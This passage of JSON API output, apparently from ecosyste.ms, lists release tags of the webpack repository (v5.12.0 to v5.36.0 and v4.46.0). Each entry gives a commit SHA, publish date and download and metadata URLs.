/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"